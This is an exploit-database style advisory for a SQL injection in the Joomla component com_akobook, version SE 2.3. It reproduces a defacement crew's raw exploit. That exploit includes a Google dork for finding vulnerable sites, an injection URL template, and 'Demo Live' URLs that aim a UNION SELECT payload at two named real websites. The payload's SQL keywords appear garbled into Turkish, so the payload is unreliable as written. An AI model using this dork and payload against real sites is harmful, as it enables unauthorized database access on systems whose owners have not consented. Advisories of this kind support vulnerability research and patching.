Joomla Component com_akobook Vulnerability

vendor:

AkoBook

by:

Ab1i

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: AkoBook

Affected Version From: SE 2.3

Affected Version To: SE 2.3

Patch Exists: NO

Related CWE: N/A

CPE: a:saddo:akobook

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_akobook Vulnerability

A vulnerability in the Joomla Component com_akobook allows an attacker to inject arbitrary SQL commands. This vulnerability is due to the lack of input validation in the 'gbid' parameter of the 'index.php' script when handling a 'reply' action. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable application. Successful exploitation could result in unauthorized access to sensitive information or the execution of arbitrary SQL commands in the back-end database.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized.

Source

Exploit-DB raw data:

Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
 ###################################################
 [+] Author        :  Ab1i
 [+] Email         :  ab1i_usta@hotmail.com
 [+] Dork  : inurl:index.php?option=com_akobook
 ###################################################
________________________________________________________
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliÄŸi%20+%20+1,2,3,4,5,6,7,8,9%20seÃ§in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliÄŸi%20+%20+1,2,3,4,5,6,7,8,9%20seÃ§in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
++++++++++++++++++++++++++++++++++++++++++++++++++
www.ayyildiz.org
TÃ¼rk 'Ã¼n TÃ¼rkten baÅŸka dostu yoktur . Sizde TÃ¼rk siteleri Destek olun ....
Turkish Defacers Ab1i
Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Ustalara Selam olsun :)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License.  </copyright>
<authorEmail>contact@saddo.ru</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>

# milw0rm.com [2009-06-09]